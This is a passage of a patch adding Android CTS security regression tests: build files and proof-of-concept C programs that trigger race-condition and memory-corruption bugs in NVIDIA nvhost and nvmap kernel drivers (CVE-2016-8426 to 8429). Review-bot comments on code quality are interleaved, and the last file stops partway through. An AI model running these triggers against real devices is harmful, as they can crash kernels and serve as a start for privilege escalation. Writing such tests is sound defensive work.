+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
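Review bot: Nothing in the file says what the test exercises or how its result is to be read. A short header comment would help whoever maintains the host-side check: it should name the device node (`/dev/nvhost-vic`), the two concurrent actions (repeated `NVHOST_IOCTL_CHANNEL_OPEN` on CPU 0, `close(target_fd)` from 100 threads on CPU 1) and the fact that the program returns 0 on every path. The comment `/* kill close thread */` above the cleanup loop should read `/* stop and join close threads */`, since the code clears `attack` and calls `pthread_join`. `prepare()`, `try_time`, `toggle_thread_id`, `ARRAY_SIZE` and the `#if 1` wrappers are unused leftovers and can be removed. The CVE-2016-8426 test is a near copy of this file and the same remarks apply there.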
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
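Review bot: The failure message for `pthread_create` prints `errno`, but `pthread_create` reports its error through the return value and does not set `errno`, so the text can name an unrelated error. Use `ret`, and mark the line as a failure rather than `[+]`: `printf("[-] create close thread %d failed %d %s\n", i, ret, strerror(ret));`.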
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
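Review bot: `ioctl()` is called in `thr()` without `<sys/ioctl.h>` being included, once with six arguments and twice with three, so unless `<linux/ion.h>` happens to pull in a prototype these calls compile only as implicit declarations. Add `#include <sys/ioctl.h>` and use the three-argument form throughout. `main()` forks in an endless loop and never reaps the children, so exited children accumulate as zombies until `fork()` fails, and a `-1` return is then handled as the parent path. Set `signal(SIGCHLD, SIG_IGN);` (from `<signal.h>`) before the loop and leave it on `pid < 0`. The threads started in `poc()` are never joined, so the trailing `usleep(100000)` is the only thing keeping the process alive for them; a comment saying so would help.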
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
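Review bot: `int g_handles_for_free[MAX_HANDLE_NUM] = {-1};` and the matching `g_handles_for_alloc` initializer set only element 0 to -1 and leave the other 999 elements at 0, which is probably not what `{-1}` was meant to express; `g_handles_for_free` is also never used. `trigger_rw_handle(int handle)` ignores its argument and passes the same `g_op_list` on every call, so the final loop in `main` issues 1000 identical requests. Either drop the parameter or add a comment that the repetition is intended. `NVMAP_HEAP_CARVEOUT_MASK` expands to `NVMAP_HEAP_IOVMM`, which is not defined in this file, so any later use of that macro will not compile.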
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
